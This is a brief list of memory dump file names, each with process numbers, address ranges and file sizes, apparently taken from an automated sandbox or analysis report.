memory/5116-414-0x0000000000400000-0x000000000089E000-memory.dmpFilesize
4.6MB
-
memory/5116-412-0x0000000000AC0000-0x0000000000B09000-memory.dmpFilesize
292KB
-
memory/5304-475-0x0000000001840000-0x0000000001842000-memory.dmpFilesize
8KB
-
memory/5552-436-0x0000000002660000-0x0000000002662000-memory.dmpFilesize
8KB
-
memory/5812-452-0x0000000000030000-0x0000000000039000-memory.dmpFilesize
36KB
-
memory/5812-454-0x0000000000400000-0x0000000000885000-memory.dmpFilesize
4.5MB